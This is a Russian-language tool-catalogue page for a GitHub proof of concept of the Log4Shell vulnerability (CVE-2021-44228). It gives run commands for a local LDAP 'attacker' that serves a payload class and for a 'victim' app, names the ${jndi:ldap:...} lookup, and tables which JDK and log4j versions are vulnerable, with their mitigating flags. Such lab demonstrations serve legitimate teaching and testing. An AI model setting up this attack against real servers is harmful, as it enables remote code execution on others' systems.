Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
sample-ldap-exploit — Краткая демонстрация CVE-2021-44228 | Kitploit
Инструменты/GitHubGitHub/phoswald/sample-ldap-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеРазработка Полезной НагрузкиЛаборатории и ПрактикаArchived
GitHubphoswald/sample-ldap-exploit

sample-ldap-exploit

Краткая демонстрация CVE-2021-44228

Репозиторий
5214 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

sample-ldap-exploit

Краткая демонстрация CVE-2021-44228

Сборка

root@kitploit:~
$ mvn clean verify

Запуск атакующего

root@kitploit:~
$ java \
  -cp 'attacker/target/sample-attacker.jar:attacker/target/lib/*' \
  sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080 payload/target/sample-payload.jar

URL-адреса:

  • http://localhost:8080/
  • http://localhost:8080/sample/payload/Payload.class

Запуск жертвы

root@kitploit:~
$ java \
  -cp 'victim/target/sample-victim.jar:victim/target/lib/*' \
  sample.victim.Victim

Результаты

JDK / JRE

ВерсияСтатус
Oracle JDK 8u5уязвим
OpenJDK 8u312Не уязвим (если не задано -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
IBM OpenJDK 8u312-b07 (OpenJ9)Не уязвим (если не задано -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 11.0.7+10Не уязвим (если не задано -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 11.0.13+8Не уязвим (если не задано -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 16+36Не уязвим (если не задано -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 17+35Не уязвим (если не задано -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 17.0.1+12Не уязвим (если не задано -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)

Если не уязвим, экземпляр javax.naming.Reference возвращается из javax.naming.Context.lookup().

Если не уязвим к загрузке классов из удалённых баз кода, другие уязвимости десериализации Java, вероятно, всё ещё существуют!

log4j

ВерсияСтатус
2.9.1уязвим
2.10.0уязвим (если не задано -Dlog4j2.formatMsgNoLookups=true или переменная окружения LOG4J_FORMAT_MSG_NO_LOOKUPS=true)
2.14.1уязвим (если не задано -Dlog4j2.formatMsgNoLookups=true или переменная окружения LOG4J_FORMAT_MSG_NO_LOOKUPS=true)
2.15.0Не уязвим

Если не уязвим, ${jndi:ldap:...} не разрешается.

Скачать инструмент